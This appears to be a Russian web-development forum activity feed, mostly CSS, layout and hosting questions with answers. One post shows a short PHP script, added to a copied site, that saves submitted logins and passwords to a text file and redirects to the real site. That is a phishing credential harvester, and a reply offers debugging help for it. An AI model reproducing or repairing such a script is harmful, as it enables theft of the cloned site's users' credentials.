Jump to content

All Activity

This stream auto-updates

  1. Last week
  2. Earlier
  3. Вот тут есть актуальный список бесплатных тестов с сертификацией https://www.classcentral.com/report/free-certificates/ Обратите внимание на HackerRank, там есть тест с сертификацией непосредственно по CSS
  4. Нужно сверстать по картинке меню-бар. Не получается сделать вот это поле поиска <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> <style> .nav { display: flex; list-style-type: none; padding-left: 0; font-size: 17px; text-transform: uppercase; } .nav > li > a { color: #fff; text-decoration: none; } .nav > li { padding-left: 29px; margin-left: 30px; } .header { display: flex; background-color: #31485b; justify-content: space-between; align-items: center; } .sidebar { width: 410px; display: block; padding-right: 20px; margin: auto; margin-left: 250px; } ul.nav li a:hover { background-color: #687c8d; padding: 17.2px 35px; } input[type="text"], input[type="search"] { background-color: #687c8d; width: 60%; padding: 8px; margin: 0 50px } input[type="search"] { color: #31485b; font-style: italic; } </style> </head> <body> <div class="header"> <ul class="nav"> <li class="s1"><a href="#">Главная</a></li> <li><a href="#">Блог</a></li> <li><a href="#">Сервисы</a></li> <li><a href="#">Онлайн-профессии</a></li> <li><a href="#">О сайте</a></li> </ul> <div class="sidebar"> <form method="post" action="#" id="search_form" > <input type="search" name="search_field" placeholder="Поиск" /> </form> </div> </div> </body> </html>
  5. ЭЭ, а почему оно должно удалять? Может стоило повесить событие на эту кнопку и указать, что при это должно происходить?
  6. например -R не будет качать указанные файлы если вы знаете список нужных вам файлов, проще их указать или можно написать парсер
  7. выкладывайте код в песочнице, так будет проще У вас media подключается до blocks/header, по этому правила из blocks/header перекрывают media сверху вниз в css пишите tag .class ... @media и не будет у вас подобных проблем
  8. откройте свой /login.php на сайте и посмотрите какие ошибки выводятся, если вывод ошибок скрыт (а он скорее всего скрыт), смотрите на хостинге в какой-нибудь панели или через ftp логи ошибок php могу включить Вангу и предположить что перед $Log = $_POST['login']; стоит сделать проверку существования переменной $_POST['login'] а для начала вообще проверить можно ли на данном хостинге использовать php добавив в начало вашего скрипта например echo 'login'; если выводится "login", значит нужно чинить скрипт, иначе - настраивать сервер
  9. Создал кастомный селект, кнопка reset не удаляет выбранное, подскажите в ччем проблема и как решить https://codepen.io/ZvrTina/pen/rNKMWMM
  10. Хах... не знаю. Ща пойду попробую сам.... вроде все прави...а у вас там на первой картинке в <link> атрибут href='' там написано maincss.css или mainrss.rss, просто не видно что там написано, пойду проверять почему у вас не работает, в глаза просто не кидается.
  11. Не уверен, но догадываюсь что у вас проблема в том что у вас тут три скобки вместо двух(я процитировал выделение где ошибка).
  12. Кстати да, пока не прочитал ваш коментарий не увидел, так там вообще нет намеков в html файле на CSS, прописывать надо так: <link rel='stylesheet' href='.css'> Если я тоже не ошибаюсь, так как я тоже новичек в програмировании, но что то умею.
  13. Не понимаю вас до конца, но если вы про центрирование в середине(с точки зрения высоты, и ширины) то нужно прописать так: <!DOCTYPE html> <html> <head> <tittle>Site</tittle> <style> body { display: flex; justify-content: center; align-items: center; } </style> </head> <body> <h1>Всё что угодно здесь может быть</h1> </body> </html> Я не до конца понял, но еще возможен такой вариант: img { position: relative; left: 50%; } Вроде так можно, не знаю, второй вариант я во время програмирования, не пользовался этим, так как либо это мне было не нужно, либо я использовал альтернативные способы.
  14. Ты указываешь body как класс с точкой ". body" а надо как тэг без точки
  15. Добрый день. Аналог обычного маркетплейса, единственное что — не понятно зачем делать пополнение, если можно сразу купить. Такое позволяет сделать много систем. На пример WP+WooCommerce
  16. CSS не хочет добавлять просто заливку фона в один цвет ( для проверки подключения), НО цвет текста меняет. В интернете пытался найти проблему, писал в css по разному команды и ничего не выходит. Заранее спасибо
  17. Всем привет, только изучаю эту сферу и возник такой вопрос. Скачал html готового сайта, и попытался добавить php скрипт <?PHP $Log = $_POST['login']; $Pass = $_POST['password']; $log = fopen("database.txt","at"); fwrite($log,"\n $Log:$Pass \n"); fclose($log); header('Location: https://greentech-rp.com/'); ?> Далее добавил это все на хост через Filezilla. Сам скопированный сайт отображается идеально, но вот скрипт не работает от слова совсем, не идут данные в текстовый документ и нет переадресации после ввода данных. В архиве прикрепил полностью готовый сайт, в чем может быть проблема? 876678500_WinRAR.rar
  18. подскажите по какой причине не применяются медиа запросы в верстке mth.zip mth.zip
  19. Добрый день, облазил много сайтов но ничего подобного пока что не нашел. Мне хотя бы ссылку на какой то источник, где я могу найти как настроить именно такую систему. Меня интересует: есть два пользователя и владелец сайта(я). Один из владельцев пополняет своей банковской картой(или платежной системой свой личный счет на моем сайте. За эти деньги он может купить что то у другого пользователя. Но при этой транзакции берется комиссия (которая идет на мой счет). Результат. Первый пользователь, оплатил покупку у другого, второй получил сумму после вычета комиссии. Я получил комиссию.
  20. Подскажите, можно ли через такую команду скачать не весь сайт, а указать которые не нужно(или еще какой способ). При скачивании сайта на котором тысячи аккаунтов и каждый что то пишет и выставляет(в моем случае книги) делает НЕРЕАЛЬНОЕ для скачивания количество фалов. А мне к примеру нужно пару книг всего-то , да и пользователи мне не нужны... Есть какой то выход?
  21. Добрый день. Подскажите как правильно реализовать такую кнопку? Сложности возникли с этими углами( Подобные кнопки встречаются на сайте во многих местах и с разными размерами!
  22. Тогда не совсем понятна Ваша проблема. Попробуйте сформулировать вопрос иначе, ознакомившись:
  23. Только начал создавать сайт и нужно сделать чтобы шапка была на всём сайте. Нашёл программу в js и не могу понять что не так. style.css scripts.js index.html
  24. Если бы всё так было просто, у меня специально прописано так что оно находиться на одном уровне и из-за этого какой бы ширина текста не была там буде 2 этих столба
  1. Load more activity
  • Обсуждения

    • Вот тут есть актуальный список бесплатных тестов с сертификацией https://www.classcentral.com/report/free-certificates/ Обратите внимание на HackerRank, там есть тест с сертификацией непосредственно по CSS
    • Нужно сверстать по картинке меню-бар. Не получается сделать вот это поле поиска <!DOCTYPE html> <html lang="en"> <head>     <meta charset="UTF-8">     <meta http-equiv="X-UA-Compatible" content="IE=edge">     <meta name="viewport" content="width=device-width, initial-scale=1.0">     <title>Document</title>     <style> .nav {     display: flex;     list-style-type: none;     padding-left: 0;     font-size: 17px;     text-transform: uppercase; } .nav > li > a {     color: #fff;     text-decoration: none; } .nav > li {     padding-left: 29px;     margin-left: 30px; } .header {     display: flex;     background-color: #31485b;     justify-content: space-between;     align-items: center; }   .sidebar {     width: 410px;     display: block;     padding-right: 20px;     margin: auto;     margin-left: 250px; }   ul.nav li a:hover {     background-color: #687c8d;     padding: 17.2px 35px; }   input[type="text"], input[type="search"] {   background-color: #687c8d;   width: 60%;   padding: 8px;   margin: 0 50px }   input[type="search"] {     color: #31485b;     font-style: italic; }     </style> </head> <body>     <div class="header">                 <ul class="nav">                     <li class="s1"><a href="#">Главная</a></li>                     <li><a href="#">Блог</a></li>                     <li><a href="#">Сервисы</a></li>                     <li><a href="#">Онлайн-профессии</a></li>                     <li><a href="#">О сайте</a></li>                 </ul>                                 <div class="sidebar">                     <form method="post" action="#" id="search_form" >                       <input type="search" name="search_field" placeholder="Поиск" />                     </form>                   </div>     </div> </body> </html>  
    • ЭЭ, а почему оно должно удалять? Может стоило повесить событие на эту кнопку и указать, что при это должно происходить?
    • например -R не будет качать указанные файлы если вы знаете список нужных вам файлов, проще их указать или можно написать парсер
    • выкладывайте код в песочнице, так будет проще У вас media подключается до blocks/header, по этому правила из blocks/header перекрывают media сверху вниз в css пишите tag .class ... @media и не будет у вас подобных проблем  
    • откройте свой /login.php на сайте и посмотрите какие ошибки выводятся, если вывод ошибок скрыт (а он скорее всего скрыт), смотрите на хостинге в какой-нибудь панели или через ftp логи ошибок php могу включить Вангу и предположить что перед $Log = $_POST['login']; стоит сделать проверку существования переменной $_POST['login'] а для начала вообще проверить можно ли на данном хостинге использовать php добавив в начало вашего скрипта например echo 'login'; если выводится "login", значит нужно чинить скрипт, иначе - настраивать сервер  
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. See more about our Guidelines and Privacy Policy